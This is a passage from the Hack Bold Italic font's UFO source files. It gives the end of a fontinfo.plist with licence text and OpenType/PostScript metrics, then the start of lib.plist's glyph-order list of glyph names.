LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE. Except as contained in this notice, the names of Gnome, the Gnome Foundation, and Bitstream Inc., shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Font Software without prior written authorization from the Gnome Foundation or Bitstream Inc., respectively. For further information, contact: fonts at gnome dot org.</string> <key>openTypeNameLicenseURL</key> <string>https://github.com/source-foundry/Hack/blob/master/LICENSE.md</string> <key>openTypeNameManufacturer</key> <string>Source Foundry</string> <key>openTypeNameManufacturerURL</key> <string>https://github.com/source-foundry</string> <key>openTypeNamePreferredFamilyName</key> <string>Hack</string> <key>openTypeNamePreferredSubfamilyName</key> <string>Bold Italic</string> <key>openTypeNameSampleText</key> <string></string> <key>openTypeNameUniqueID</key> <string>SourceFoundry: Hack Bold Italic: 2018</string> <key>openTypeNameVersion</key> <string>Version 3.003</string> <key>openTypeOS2CodePageRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>4</integer> <integer>7</integer> <integer>8</integer> <integer>29</integer> <integer>48</integer> <integer>49</integer> <integer>50</integer> <integer>52</integer> <integer>54</integer> <integer>55</integer> <integer>56</integer> <integer>57</integer> <integer>58</integer> <integer>59</integer> <integer>60</integer> <integer>62</integer> <integer>63</integer> </array> <key>openTypeOS2FamilyClass</key> <array> <integer>0</integer> <integer>0</integer> </array> <key>openTypeOS2Panose</key> <array> <integer>2</integer> <integer>11</integer> <integer>8</integer> <integer>9</integer> <integer>3</integer> <integer>2</integer> <integer>2</integer> <integer>9</integer> <integer>2</integer> <integer>4</integer> </array> <key>openTypeOS2Selection</key> <array> </array> <key>openTypeOS2StrikeoutPosition</key> <integer>530</integer> <key>openTypeOS2StrikeoutSize</key> <integer>102</integer> <key>openTypeOS2SubscriptXOffset</key> <integer>-29</integer> <key>openTypeOS2SubscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SubscriptYOffset</key> <integer>153</integer> <key>openTypeOS2SubscriptYSize</key> <integer>1228</integer> <key>openTypeOS2SuperscriptXOffset</key> <integer>136</integer> <key>openTypeOS2SuperscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SuperscriptYOffset</key> <integer>716</integer> <key>openTypeOS2SuperscriptYSize</key> <integer>1228</integer> <key>openTypeOS2Type</key> <array> <integer>0</integer> </array> <key>openTypeOS2TypoAscender</key> <integer>1556</integer> <key>openTypeOS2TypoDescender</key> <integer>-492</integer> <key>openTypeOS2TypoLineGap</key> <integer>410</integer> <key>openTypeOS2UnicodeRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>5</integer> <integer>6</integer> <integer>7</integer> <integer>9</integer> <integer>10</integer> <integer>24</integer> <integer>26</integer> <integer>29</integer> <integer>31</integer> <integer>32</integer> <integer>33</integer> <integer>35</integer> <integer>36</integer> <integer>37</integer> <integer>38</integer> <integer>39</integer> <integer>43</integer> <integer>44</integer> <integer>45</integer> </array> <key>openTypeOS2VendorID</key> <string>SRC</string> <key>openTypeOS2WeightClass</key> <integer>700</integer> <key>openTypeOS2WidthClass</key> <integer>5</integer> <key>openTypeOS2WinAscent</key> <integer>1901</integer> <key>openTypeOS2WinDescent</key> <integer>483</integer> <key>postscriptBlueFuzz</key> <integer>0</integer> <key>postscriptBlueScale</key> <real>0.036999999999999998</real> <key>postscriptBlueShift</key> <integer>14</integer> <key>postscriptBlueValues</key> <array> <integer>-29</integer> <integer>0</integer> <integer>1120</integer> <integer>1149</integer> <integer>1493</integer> <integer>1520</integer> </array> <key>postscriptFontName</key> <string>Hack-BoldItalic</string> <key>postscriptForceBold</key> <true/> <key>postscriptFullName</key> <string>Hack Bold Italic</string> <key>postscriptIsFixedPitch</key> <true/> <key>postscriptOtherBlues</key> <array> <integer>-440</integer> <integer>-426</integer> </array> <key>postscriptStemSnapH</key> <array> <integer>260</integer> <integer>114</integer> <integer>172</integer> <integer>225</integer> </array> <key>postscriptStemSnapV</key> <array> <integer>160</integer> <integer>114</integer> <integer>295</integer> <integer>320</integer> </array> <key>postscriptUnderlinePosition</key> <integer>-220</integer> <key>postscriptUnderlineThickness</key> <integer>90</integer> <key>postscriptUniqueID</key> <integer>-1</integer> <key>styleMapFamilyName</key> <string>Hack</string> <key>styleMapStyleName</key> <string>bold italic</string> <key>styleName</key> <string>Bold Italic</string> <key>trademark</key> <string></string> <key>unitsPerEm</key> <integer>2048</integer> <key>versionMajor</key> <integer>3</integer> <key>versionMinor</key> <integer>003</integer> <key>xHeight</key> <integer>1120</integer> </dict> </plist>
Hack/source/Hack-BoldItalic.ufo/lib.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>public.glyphOrder</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</string> <string>Acircumflex</string> <string>Adieresis</string> <string>Agrave</string> <string>Amacron</string> <string>Aogonek</string> <string>Aring</string> <string>Atilde</string> <string>AE</string> <string>B</string> <string>C</string> <string>Cacute</string> <string>Ccaron</string> <string>Ccedilla</string> <string>Cdotaccent</string> <string>D</string> <string>Eth</string> <string>Dcaron</string> <string>Dcroat</string> <string>E</string> <string>Eacute</string> <string>Ecaron</string> <string>Ecircumflex</string> <string>Edieresis</string> <string>Edotaccent</string> <string>Egrave</string> <string>Emacron</string> <string>Eogonek</string> <string>F</string> <string>G</string> <string>Gbreve</string> <string>Gcaron</string> <string>uni0122</string> <string>Gdotaccent</string> <string>H</string> <string>Hbar</string> <string>I</string> <string>Iacute</string> <string>Icircumflex</string> <string>Idieresis</string> <string>Idotaccent</string> <string>Igrave</string> <string>Imacron</string> <string>Iogonek</string> <string>Itilde</string> <string>J</string> <string>K</string> <string>uni0136</string> <string>L</string> <string>Lacute</string> <string>Lcaron</string> <string>uni013B</string> <string>Lslash</string> <string>M</string> <string>N</string> <string>Nacute</string> <string>Ncaron</string> <string>uni0145</string> <string>Eng</string> <string>Ntilde</string> <string>O</string> <string>Oacute</string> <string>Ocircumflex</string> <string>Odieresis</string> <string>Ograve</string> <string>Ohorn</string> <string>Ohungarumlaut</string> <string>Omacron</string> <string>Oslash</string> <string>Oslashacute</string> <string>Otilde</string> <string>OE</string> <string>P</string> <string>Thorn</string> <string>Q</string> <string>R</string> <string>Racute</string> <string>Rcaron</string> <string>uni0156</string> <string>S</string> <string>Sacute</string> <string>Scaron</string> <string>Scedilla</string> <string>uni0218</string> <string>T</string> <string>Tbar</string> <string>Tcaron</string> <string>uni021A</string> <string>U</string> <string>Uacute</string> <string>Ucircumflex</string> <string>Udieresis</string> <string>Ugrave</string> <string>Uhorn</string> <string>Uhungarumlaut</string> <string>Umacron</string> <string>Uogonek</string> <string>Uring</string> <string>Utilde</string> <string>V</string> <string>W</string> <string>Wacute</string> <string>Wcircumflex</string> <string>Wdieresis</string> <string>Wgrave</string> <string>X</string> <string>Y</string> <string>Yacute</string> <string>Ycircumflex</string> <string>Ydieresis</string> <string>Ygrave</string> <string>Z</string> <string>Zacute</string> <string>Zcaron</string> <string>Zdotaccent</string> <string>a</string> <string>aacute</string> <string>abreve</string> <string>acircumflex</string> <string>adieresis</string> <string>agrave</string> <string>amacron</string> <string>aogonek</string> <string>aring</string> <string>atilde</string> <string>ae</string> <string>b</string> <string>c</string> <string>cacute</string> <string>ccaron</string> <string>ccedilla</string> <string>cdotaccent</string> <string>d</string> <string>eth</string> <string>dcaron</string> <string>dcroat</string> <string>e</string> <string>eacute</string> <string>ecaron</string> <string>ecircumflex</string> <string>edieresis</string> <string>edotaccent</string> <string>egrave</string> <string>emacron</string> <string>Ebreve</string> <string>ebreve</string> <string>eogonek</string> <string>f</string> <string>g</string> <string>gbreve</string> <string>gcaron</string> <string>uni0123</string> <string>gdotaccent</string> <string>h</string> <string>hbar</string> <string>i</string> <string>dotlessi</string> <string>iacute</string> <string>icircumflex</string> <string>idieresis</string> <string>igrave</string> <string>imacron</string> <string>Ibreve</string> <string>ibreve</string> <string>iogonek</string> <string>itilde</string> <string>j</string> <string>k</string> <string>uni0137</string> <string>l</string> <string>lacute</string> <string>lcaron</string> <string>longs</string> <string>uni013C</string> <string>lslash</string> <string>m</string> <string>n</string> <string>nacute</string> <string>ncaron</string> <string>uni0146</string> <string>eng</string> <string>ntilde</string> <string>o</string> <string>oacute</string> <string>ocircumflex</string> <string>odieresis</string> <string>ograve</string> <string>ohorn</string> <string>ohungarumlaut</string> <string>omacron</string> <string>Obreve</string> <string>obreve</string> <string>oslash</string> <string>oslashacute</string> <string>otilde</string> <string>oe</string> <string>p</string> <string>thorn</string> <string>q</string> <string>r</string> <string>racute</string> <string>rcaron</string> <string>uni0157</string> <string>s</string> <string>sacute</string> <string>scaron</string> <string>scedilla</string> <string>uni0219</string> <string>germandbls</string> <string>t</string> <string>tbar</string> <string>tcaron</string> <string>uni021B</string> <string>u</string> <string>uacute</string> <string>ucircumflex</string> <string>udieresis</string> <string>ugrave</string> <string>uhorn</string> <string>uhungarumlaut</string> <string>umacron</string> <string>uogonek</string> <string>uring</string> <string>utilde</string> <string>v</string> <string>w</string> <string>wacute</string> <string>wcircumflex</string> <string>wdieresis</string> <string>wgrave</string> <string>x</string> <string>y</string> <string>yacute</string> <string>ycircumflex</string> <string>ydieresis</string> <string>ygrave</string> <string>z</string> <string>zacute</string> <string>zcaron</string> <string>zdotaccent</string> <string>ordfeminine</string> <string>ordmasculine</string> <string>uni0410</string> <string>uni0411</string> <string>uni0412</string> <string>uni0413</string> <string>uni0403</string> <string>uni0490</string> <string>uni0414</string> <string>uni0415</string> <string>uni0400</string> <string>uni0401</string> <string>uni0416</string> <string>uni0417</string> <string>uni0418</string> <string>uni0419</string> <string>uni040D</string> <string>uni041A</string> <string>uni040C</string> <string>uni041B</string> <string>uni041C</string> <string>uni041D</string> <string>uni041E</string> <string>uni041F</string> <string>uni0420</string> <string>uni0421</string> <string>uni0422</string> <string>uni0423</string> <string>uni040E</string> <string>uni0424</string> <string>uni0425</string> <string>uni0427</string> <string>uni0426</string> <string>uni0428</string> <string>uni0429</string> <string>uni040F</string> <string>uni042F</string> <string>uni042C</string> <string>uni042A</string> <string>uni042B</string> <string>uni0409</string> <string>uni040A</string> <string>uni0405</string> <string>uni0404</string> <string>uni042D</string> <string>uni0406</string> <string>uni0407</string> <string>uni0408</string> <string>uni040B</string> <string>uni042E</string> <string>uni0402</string> <string>uni0462</string> <string>uni0472</string> <string>uni0492</string> <string>uni0494</string> <string>uni0496</string> <string>uni0498</string> <string>uni049A</string> <string>uni04A2</string> <string>uni04AA</string> <string>uni04AC</string> <string>uni04AE</string> <string>uni04B0</string> <string>uni04B2</string> <string>uni04BA</string> <string>uni04C0</string> <string>uni04C1</string> <string>uni04C3</string> <string>uni04C7</string> <string>uni04CB</string> <string>uni04D0</string> <string>uni04D2</string> <string>uni04D6</string> <string>uni04D8</string> <string>uni04DA</string> <string>uni04DC</string> <string>uni04DE</string> <string>uni04E0</string> <string>uni04E2</string> <string>uni04E4</string> <string>uni04E6</string> <string>uni04E8</string> <string>uni04EA</string> <string>uni04EC</string> <string>uni04EE</string> <string>uni04F0</string> <string>uni04F2</string> <string>uni04F4</string> <string>uni04F6</string> <string>uni04F8</string> <string>uni0510</string> <string>uni051A</string> <string>uni051C</string> <string>uni0430</string> <string>uni0431</string> <string>uni0432</string> <string>uni0433</string> <string>uni0453</string> <string>uni0491</string> <string>uni0434</string> <string>uni0435</string> <string>uni0450</string> <string>uni0451</string> <string>uni0436</string> <string>uni0437</string> <string>uni0438</string> <string>uni0439</string> <string>uni045D</string> <string>uni043A</string> <string>uni045C</string> <string>uni043B</string> <string>uni043C</string> <string>uni043D</string> <string>uni043E</string> <string>uni043F</string> <string>uni0440</string> <string>uni0441</string> <string>uni0442</string> <string>uni0443</string> <string>uni045E</string> <string>uni0444</string> <string>uni0445</string> <string>uni0447</string> <string>uni0446</string> <string>uni0448</string> <string>uni0449</string> <string>uni045F</string> <string>uni044F</string> <string>uni044C</string> <string>uni044A</string> <string>uni044B</string> <string>uni0459</string> <string>uni045A</string> <string>uni0455</string> <string>uni0454</string> <string>uni044D</string> <string>uni0456</string> <string>uni0457</string> <string>uni0458</string> <string>uni045B</string> <string>uni044E</string> <string>uni0452</string> <string>uni0463</string> <string>uni0473</string> <string>uni0493</string> <string>uni0495</string> <string>uni0497</string> <string>uni0499</string> <string>uni049B</string> <string>uni04A3</string> <string>uni04AB</string> <string>uni04AD</string> <string>uni04AF</string> <string>uni04B1</string> <string>uni04B3</string> <string>uni04BB</string> <string>uni04CF</string> <string>uni04C2</string> <string>uni04C4</string> <string>uni04C8</string> <string>uni04CC</string> <string>uni04D1</string> <string>uni04D3</string> <string>uni04D7</string> <string>uni04D9</string> <string>uni04DB</string> <string>uni04DD</string> <string>uni04DF</string> <string>uni04E1</string> <string>uni04E3</string> <string>uni04E5</string> <string>uni04E7</string> <string>uni04E9</string> <string>uni04EB</string> <string>uni04ED</string> <string>uni04EF</string> <string>uni04F1</string> <string>uni04F3</string> <string>uni04F5</string> <string>uni04F7</string> <string>uni04F9</string> <string>uni0511</string> <string>uni051B</string> <string>uni051D</string> <string>uni04A4</string> <string>uni04A5</string> <string>uni04D4</string> <string>uni04D5</string> <string>uni0394</string> <string>uni03F4</string> <string>uni03BC</string> <string>uni0531</string> <string>uni0532</string> <string>uni0533</string> <string>uni0534</string> <string>uni0535</string> <string>uni0536</string> <string>uni0537</string> <string>uni0538</string> <string>uni0539</string> <string>uni053A</string> <string>uni053B</string> <string>uni053C</string> <string>uni053D</string> <string>uni053E</string> <string>uni053F</string> <string>uni0540</string> <string>uni0541</string> <string>uni0542</string> <string>uni0543</string> <string>uni0544</string> <string>uni0545</string> <string>uni0546</string> <string>uni0547</string> <string>uni0548</string> <string>uni0549</string> <string>uni054A</string> <string>uni054B</string> <string>uni054C</string> <string>uni054D</string> <string>uni054E</string> <string>uni054F</string> <string>uni0550</string> <string>uni0551</string> <string>uni0552</string> <string>uni0553</string> <string>uni0554</string> <string>uni0555</string> <string>uni0556</string> <string>uni0561</string> <string>uni0562</string> <string>uni0563</string> <string>uni0564</string> <string>uni0565</string> <string>uni0566</string> <string>uni0567</string> <string>uni0568</string> <string>uni0569</string> <string>uni056A</string> <string>uni056B</string> <string>uni056C</string> <string>uni056D</string> <string>uni056E</string> <string>uni056F</string> <string>uni0570</string> <string>uni0571</string> <string>uni0572</string> <string>uni0573</string> <string>uni0574</string> <string>uni0575</string> <string>uni0576</string> <string>uni0577</string> <string>uni0578</string> <string>uni0579</string> <string>uni057A</string> <string>uni057B</string> <string>uni057C</string> <string>uni057D</string> <string>uni057E</string> <string>uni057F</string> <string>uni0580</string> <string>uni0581</string> <string>uni0582</string> <string>uni0583</string> <string>uni0584</string> <string>uni0585</string> <string>uni0586</string> <string>uni0587</string> <string>uni10D0</string> <string>uni10D1</string> <string>uni10D2</string> <string>uni10D3</string> <string>uni10D4</string> <string>uni10D5</string> <string>uni10D6</string> <string>uni10D7</string> <string>uni10D8</string> <string>uni10D9</string> <string>uni10DA</string> <string>uni10DB</string> <string>uni10DC</string> <string>uni10DD</string> <string>uni10DE</string> <string>uni10DF</string> <string>uni10E0</string> <string>uni10E1</string> <string>uni10E2</string> <string>uni10E3</string> <string>uni10E4</string> <string>uni10E5</string> <string>uni10E6</string> <string>uni10E7</string> <string>uni10E8</string> <string>uni10E9</string> <string>uni10EA</string> <string>uni10EB</string> <string>uni10EC</string> <string>uni10ED</string> <string>uni10EE</string> <string>uni10EF</string> <string>uni10F0</string> <string>uni10F1</string> <string>uni10F2</string> <string>uni10F3</string> <string>uni10F4</string> <string>uni10F5</string> <string>uni10F6</string> <string>uni10F7</string> <string>uni10F8</string> <string>uni10F9</string> <string>uni10FA</string> <string>uni10FC</string> <string>zero</string> <string>one</string> <string>two</string> <string>three</string> <string>four</string> <string>five</string> <string>six</string> <string>seven</string> <string>eight</string> <string>nine</string> <string>uni2215</string> <string>uni215F</string> <string>onehalf</string> <string>uni2189</string> <string>uni2153</string> <string>uni2154</string> <string>onequarter</string> <string>threequarters</string> <string>oneeighth</string> <string>threeeighths</string> <string>fiveeighths</string> <string>seveneighths</string> <string>uni00B9</string> <string>uni00B2</string> <string>uni00B3</string> <string>asterisk</string> <string>backslash</string> <string>uni2219</string> <string>bullet</string> <string>colon</string> <string>comma</string> <string>onedotenleader</string> <string>twodotenleader</string> <string>ellipsis</string> <string>exclam</string> <string>exclamdbl</string> <string>exclamdown</string> <string>numbersign</string> <string>period</string> <string>question</string> <string>uni2047</string> <string>questiondown</string> <string>quotedbl</string> <string>quotesingle</string> <string>semicolon</string> <string>slash</string> <string>underscore</string> <string>underscoredbl</string> <string>uni2016</string> <string>uni2023</string> <string>hyphenationpoint</string> <string>uni203D</string> <string>uni203E</string> <string>uni203F</string> <string>uni2045</string> <string>uni2046</string> <string>uni2048</string> <string>uni2049</string> <string>uni204B</string> <string>uni2E18</string> <string>uni2E1F</string> <string>uni2E2E</string> <string>exclamdown.case</string> <string>uni2E18.case</string> <string>questiondown.case</string> <string>uni208D</string> <string>uni208E</string> <string>braceleft</string> <string>braceright</string> <string>bracketleft</string> <string>bracketright</string> <string>uni2E24</string> <string>uni2E25</string> <string>uni2E22</string> <string>uni2E23</string> <string>parenleft</string> <string>parenright</string> <string>uni207D</string> <string>uni207E</string> <string>uni27C5</string> <string>uni27C6</string> <string>uni2987</string> <string>uni2988</string> <string>uni2997</string> <string>uni2998</string> <string>emdash</string> <string>endash</string> <string>figuredash</string> <string>hyphen</string> <string>uni00AD</string> <string>uni2010</string> <string>uni2011</string> <string>uni2015</string> <string>guilsinglleft</string> <string>guilsinglright</string> <string>quotedblbase</string> <string>quotedblleft</string> <string>quotedblright</string> <string>quoteleft</string> <string>quotereversed</string> <string>quoteright</string> <string>quotesinglbase</string> <string>uni201F</string> <string>minute</string> <string>second</string> <string>millisecond</string> <string>uni2035</string> <string>uni2036</string> <string>uni2037</string> <string>uni27E6</string> <string>uni27E7</string> <string>uni27E8</string> <string>uni27E9</string> <string>uni27EA</string> <string>uni27EB</string> <string>uni10FB</string> <string>uni055A</string> <string>uni055B</string> <string>uni055C</string> <string>uni055D</string> <string>uni055E</string> <string>uni055F</string> <string>uni0589</string> <string>uni058A</string> <string>uni205F</string> <string>uni00A0</string> <string>uni2000</string> <string>uni2001</string> <string>uni2002</string> <string>uni2003</string> <string>uni2004</string> <string>uni2005</string> <string>uni2006</string> <string>uni2007</string> <string>uni2008</string> <string>uni2009</string> <string>uni200A</string> <string>uni202F</string> <string>Abreve</string> <string>cent</string> <string>colonmonetary</string> <string>currency</string> <string>dollar</string> <string>dong</string> <string>Euro</string> <string>florin</string> <string>franc</string> <string>lira</string> <string>peseta</string> <string>sterling</string> <string>uni0E3F</string> <string>uni20A0</string> <string>uni20A2</string> <string>uni20A5</string> <string>uni20A6</string> <string>uni20A8</string> <string>uni20A9</string> <string>uni20AA</string> <string>uni20AD</string> <string>uni20AE</string> <string>uni20AF</string> <string>uni20B0</string> <string>uni20B1</string> <string>uni20B2</string> <string>uni20B3</string> <string>uni20B4</string> <string>uni20B5</string> <string>uni20B8</string> <string>uni20B9</string> <string>yen</string> <string>angle</string> <string>approxequal</string> <string>asteriskmath</string> <string>asciitilde</string> <string>circlemultiply</string> <string>circleplus</string> <string>congruent</string> <string>divide</string> <string>dotmath</string> <string>element</string> <string>emptyset</string> <string>equal</string> <string>equivalence</string> <string>existential</string> <string>gradient</string> <string>greater</string> <string>greaterequal</string> <string>infinity</string> <string>integral</string> <string>integralbt</string> <string>integraltp</string> <string>intersection</string> <string>less</string> <string>lessequal</string> <string>logicaland</string> <string>logicalnot</string> <string>logicalor</string> <string>minus</string> <string>multiply</string> <string>notelement</string> <string>notequal</string> <string>notsubset</string> <string>orthogonal</string> <string>partialdiff</string> <string>percent</string> <string>uni27C2</string> <string>perthousand</string> <string>plus</string> <string>plusminus</string> <string>periodcentered</string> <string>product</string> <string>propersubset</string> <string>propersuperset</string> <string>proportional</string> <string>radical</string> <string>reflexsubset</string> <string>reflexsuperset</string> <string>revlogicalnot</string> <string>similar</string> <string>suchthat</string> <string>summation</string> <string>therefore</string> <string>uni2031</string> <string>uni207A</string> <string>uni207B</string> <string>uni207C</string> <string>uni208A</string> <string>uni208B</string> <string>uni208C</string> <string>uni2126</string> <string>uni2201</string> <string>uni2204</string> <string>uni220A</string> <string>uni220C</string> <string>uni220D</string> <string>uni220E</string> <string>uni2210</string> <string>uni2213</string> <string>uni2218</string> <string>uni221B</string> <string>uni221C</string> <string>uni2223</string> <string>uni222C</string> <string>uni222D</string> <string>uni2235</string> <string>uni2236</string> <string>uni2237</string> <string>uni2238</string> <string>uni2239</string> <string>uni223A</string> <string>uni223B</string> <string>uni223D</string> <string>uni2241</string> <string>uni2242</string> <string>uni2243</string> <string>uni2244</string> <string>uni2246</string> <string>uni2247</string> <string>uni2249</string> <string>uni224A</string> <string>uni224B</string> <string>uni224C</string> <string>uni224D</string> <string>uni224E</string> <string>uni224F</string> <string>uni2250</string> <string>uni2251</string> <string>uni2252</string> <string>uni2253</string> <string>uni2254</string> <string>uni2255</string> <string>uni2256</string> <string>uni2257</string> <string>uni2258</string> <string>uni2259</string> <string>uni225A</string> <string>uni225B</string> <string>uni225C</string> <string>uni225D</string> <string>uni225E</string> <string>uni225F</string> <string>uni2262</string> <string>uni2263</string> <string>uni2266</string> <string>uni2267</string> <string>uni2268</string> <string>uni2269</string> <string>uni226D</string> <string>uni226E</string> <string>uni226F</string> <string>uni2270</string> <string>uni2271</string> <string>uni2272</string> <string>uni2273</string> <string>uni2274</string> <string>uni2275</string> <string>uni2276</string> <string>uni2277</string> <string>uni2278</string> <string>uni2279</string> <string>uni227A</string> <string>uni227B</string> <string>uni227C</string> <string>uni227D</string> <string>uni227E</string> <string>uni227F</string> <string>uni2280</string> <string>uni2281</string> <string>uni2285</string> <string>uni2288</string> <string>uni2289</string> <string>uni228A</string> <string>uni228B</string> <string>uni228D</string> <string>uni228E</string> <string>uni228F</string> <string>uni2290</string> <string>uni2291</string> <string>uni2292</string> <string>uni2293</string> <string>uni2294</string> <string>uni2296</string> <string>uni2298</string> <string>uni2299</string> <string>uni229A</string> <string>uni229B</string> <string>uni229C</string> <string>uni229D</string> <string>uni229E</string> <string>uni229F</string> <string>uni22A0</string> <string>uni22A1</string> <string>uni22A2</string> <string>uni22A3</string> <string>uni22A4</string> <string>uni22B2</string> <string>uni22B3</string> <string>uni22B4</string> <string>uni22B5</string> <string>uni22B8</string> <string>uni22C2</string> <string>uni22C3</string> <string>uni22C4</string> <string>uni22C6</string> <string>uni22CD</string> <string>uni22CE</string> <string>uni22CF</string> <string>uni22D0</string> <string>uni22D1</string> <string>uni22DA</string> <string>uni22DB</string> <string>uni22DC</string> <string>uni22DD</string> <string>uni22DE</string> <string>uni22DF</string> <string>uni22E0</string> <string>uni22E1</string> <string>uni22E2</string> <string>uni22E3</string> <string>uni22E4</string> <string>uni22E5</string> <string>uni22E6</string> <string>uni22E7</string> <string>uni22E8</string> <string>uni22E9</string> <string>uni22EF</string> <string>uni2308</string> <string>uni2309</string> <string>uni230A</string> <string>uni230B</string> <string>uni239B</string> <string>uni239C</string> <string>uni239D</string> <string>uni239E</string> <string>uni239F</string> <string>uni23A0</string> <string>uni23A1</string> <string>uni23A2</string> <string>uni23A3</string> <string>uni23A4</string> <string>uni23A5</string> <string>uni23A6</string> <string>uni23A7</string> <string>uni23A8</string> <string>uni23A9</string> <string>uni23AA</string> <string>uni23AB</string> <string>uni23AC</string> <string>uni23AD</string> <string>uni23AE</string> <string>uni27DC</string> <string>uni27E0</string> <string>uni29EB</string> <string>uni29FA</string> <string>uni29FB</string> <string>uni2A00</string> <string>uni2A2F</string> <string>uni2A6A</string> <string>uni2A6B</string> <string>union</string> <string>universal</string> <string>arrowup</string> <string>uni2197</string> <string>arrowright</string> <string>uni2198</string> <string>arrowdown</string> <string>uni2199</string> <string>arrowleft</string> <string>uni2196</string> <string>arrowboth</string> <string>arrowupdn</string> <string>uni21F5</string> <string>uni219A</string> <string>uni219B</string> <string>uni21F7</string> <string>uni21F8</string> <string>uni21F9</string> <string>uni21FA</string> <string>uni21FB</string> <string>uni21AE</string> <string>uni21FC</string> <string>uni219C</string> <string>uni219D</string> <string>uni21AD</string> <string>uni219E</string> <string>uni219F</string> <string>uni21A0</string> <string>uni21A1</string> <string>uni21A2</string> <string>uni21A3</string> <string>uni21A4</string> <string>uni21A5</string> <string>uni21A6</string> <string>uni21A7</string> <string>arrowupdnbse</string> <string>uni21E4</string> <string>uni21E5</string> <string>uni21B9</string> <string>uni21A9</string> <string>uni21AA</string> <string>uni21AB</string> <string>uni21AC</string> <string>uni21AF</string> <string>uni21B0</string> <string>uni21B1</string> <string>uni21B2</string> <string>uni21B3</string> <string>uni21B4</string> <string>carriagereturn</string> <string>uni21B6</string> <string>uni21B7</string> <string>uni21B8</string> <string>uni21F1</string> <string>uni21F2</string> <string>uni21BA</string> <string>uni21BB</string> <string>uni21BC</string> <string>uni21BD</string> <string>uni21BE</string> <string>uni21BF</string> <string>uni21C0</string> <string>uni21C1</string> <string>uni21C2</string> <string>uni21C3</string> <string>uni21CB</string> <string>uni21CC</string> <string>uni21C4</string> <string>uni21C5</string> <string>uni21C6</string> <string>uni21C8</string> <string>uni21C9</string> <string>uni21CA</string> <string>uni21C7</string> <string>arrowdblup</string> <string>uni21D7</string> <string>arrowdblright</string> <string>uni21D8</string> <string>arrowdbldown</string> <string>uni21D9</string> <string>arrowdblleft</string> <string>uni21D6</string> <string>arrowdblboth</string> <string>uni21D5</string> <string>uni21CD</string> <string>uni21CE</string> <string>uni21CF</string> <string>uni21DA</string> <string>uni21DB</string> <string>uni21DC</string> <string>uni21DD</string> <string>uni21E0</string> <string>uni21E1</string> <string>uni21E2</string> <string>uni21E3</string> <string>uni21E7</string> <string>uni21E8</string> <string>uni21E9</string> <string>uni21E6</string> <string>uni21EB</string> <string>uni21EC</string> <string>uni21ED</string> <string>uni21EE</string> <string>uni21EF</string> <string>uni21F0</string> <string>uni21F3</string> <string>uni21F4</string> <string>uni21F6</string> <string>uni21FD</string> <string>uni21FE</string> <string>uni21FF</string> <string>uni2304</string> <string>uni2B06</string> <string>uni2B08</string> <string>uni2B0A</string> <string>uni2B07</string> <string>uni2B0B</string> <string>uni2B05</string> <string>uni2B09</string> <string>uni2B0C</string> <string>uni2B0D</string> <string>uni27F5</string> <string>uni27F6</string> <string>uni27F7</string> <string>uni2581</string> <string>uni2582</string> <string>uni2583</string> <string>dnblock</string> <string>uni2585</string> <string>uni2586</string> <string>uni2587</string> <string>block</string> <string>upblock</string> <string>uni2594</string> <string>uni258F</string> <string>uni258E</string> <string>uni258D</string> <string>lfblock</string> <string>uni258B</string> <string>uni258A</string> <string>uni2589</string> <string>rtblock</string> <string>uni2595</string> <string>uni2596</string> <string>uni2597</string> <string>uni2598</string> <string>uni2599</string> <string>uni259A</string> <string>uni259B</string> <string>uni259C</string> <string>uni259D</string> <string>uni259E</string> <string>uni259F</string> <string>ltshade</string> <string>shade</string> <string>dkshade</string> <string>uni25CF</string> <string>circle</string> <string>uni25EF</string> <string>uni25D0</string> <string>uni25D1</string> <string>uni25D2</string> <string>uni25D3</string> <string>uni25D6</string> <string>uni25D7</string> <string>uni25D4</string> <string>uni25D5</string> <string>uni25F4</string> <string>uni25F5</string> <string>uni25F6</string> <string>uni25F7</string> <string>uni25CD</string> <string>uni25CC</string> <string>uni25C9</string> <string>uni25CE</string> <string>openbullet</string> <string>invbullet</string> <string>invcircle</string> <string>uni25DA</string> <string>uni25DB</string> <string>uni25E0</string> <string>uni25E1</string> <string>uni25DC</string> <string>uni25DD</string> <string>uni25DE</string> <string>uni25DF</string> <string>uni25C6</string> <string>uni25C7</string> <string>uni2B16</string> <string>uni2B17</string> <string>uni2B18</string> <string>uni2B19</string> <string>uni25C8</string> <string>lozenge</string> <string>uni25B0</string> <string>uni25B1</string> <string>uni25AE</string> <string>filledrect</string> <string>uni25AD</string> <string>uni25AF</string> <string>uni250C</string> <string>uni2514</string> <string>uni2510</string> <string>uni2518</string> <string>uni253C</string> <string>uni252C</string> <string>uni2534</string> <string>uni251C</string> <string>uni2524</string> <string>uni2500</string> <string>uni2502</string> <string>uni2561</string> <string>uni2562</string> <string>uni2556</string> <string>uni2555</string> <string>uni2563</string> <string>uni2551</string> <string>uni2557</string> <string>uni255D</string> <string>uni255C</string> <string>uni255B</string> <string>uni255E</string> <string>uni255F</string> <string>uni255A</string> <string>uni2554</string> <string>uni2569</string> <string>uni2566</string> <string>uni2560</string> <string>uni2550</string> <string>uni256C</string> <string>uni2567</string> <string>uni2568</string> <string>uni2564</string> <string>uni2565</string> <string>uni2559</string> <string>uni2558</string> <string>uni2552</string> <string>uni2553</string> <string>uni256B</string> <string>uni256A</string> <string>filledbox</string> <string>uni25A1</string> <string>uni25A2</string> <string>uni25A3</string> <string>uni2B1A</string> <string>uni25A4</string> <string>uni25A5</string> <string>uni25A6</string> <string>uni25A7</string> <string>uni25A8</string> <string>uni25A9</string> <string>uni25AA</string> <string>uni25AB</string> <string>uni25E7</string> <string>uni25E8</string> <string>uni25E9</string> <string>uni25EA</string> <string>uni25EB</string> <string>uni25F0</string> <string>uni25F1</string> 